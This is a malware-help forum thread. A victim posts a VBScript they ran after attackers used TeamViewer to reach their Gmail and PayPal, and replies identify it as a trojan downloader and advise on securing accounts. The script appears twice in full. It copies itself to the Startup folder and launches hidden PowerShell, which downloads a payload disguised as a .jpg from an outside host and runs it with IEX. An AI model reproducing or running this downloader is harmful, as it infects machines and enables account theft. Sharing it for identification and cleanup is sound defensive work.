Jump to content
NotMikaa

What is this virus and how can i go about cleaning?

By NotMikaa, in Malware Finding and Cleaning

Recommended Posts

NotMikaa    0

NotMikaa
Posted

Hi!

So i came about this being dumb and installed it.
Didn't think anything of it at first until i noticed out of the corner of my eye that team viewer was  opened and they were attempting to go into my gmail.
They've already looked into my paypal.

  

dim s15001
const CONSOLE_HIDE=0
const CONSOLE_SHOW=1
const CMD_WAIT=true
set oShell = wscript.createObject("WScript.Shell")
set sysOb = createobject("scripting.filesystemobject")
startup = oShell.specialfolders ("startup") & "\update.vbs"
sysOb.copyfile wscript.scriptfullname,startup ,true
oShell.run "cmd /c powers" & "hell " & "-ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('htt" & "p://" & "www.m9c.net/uploads/15744376681.jpg');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results", CONSOLE_HIDE, CMD_WAIT

 

Share this post

Link to post
Share on other sites

Marcos    3,030

Marcos
Posted

A detection was added several days ago, the script is detected as VBS/TrojanDownloader.Agent.SGV trojan. When the malware is detected, it should be cleaned without issues since it's a simple VB downloader script.

Share this post

Link to post
Share on other sites

Rami    50

Rami
Posted (edited)
On 12/1/2019 at 7:58 AM, NotMikaa said:

Hi!

So i came about this being dumb and installed it.
Didn't think anything of it at first until i noticed out of the corner of my eye that team viewer was  opened and they were attempting to go into my gmail.
They've already looked into my paypal.

  


dim s15001
const CONSOLE_HIDE=0
const CONSOLE_SHOW=1
const CMD_WAIT=true
set oShell = wscript.createObject("WScript.Shell")
set sysOb = createobject("scripting.filesystemobject")
startup = oShell.specialfolders ("startup") & "\update.vbs"
sysOb.copyfile wscript.scriptfullname,startup ,true
oShell.run "cmd /c powers" & "hell " & "-ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('htt" & "p://" & "www.m9c.net/uploads/15744376681.jpg');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results", CONSOLE_HIDE, CMD_WAIT

 

You should secure your TeamViewer/AnyDesk or whatever your remote desktop software is

Put a good password and limit access only to your PCs.

Because they have got access to several accounts of yours , you should change all passwords now , and secure them with 2-step verification for more secure entry to your accounts.

Edited by Rami

Share this post

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go To Topic Listing

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...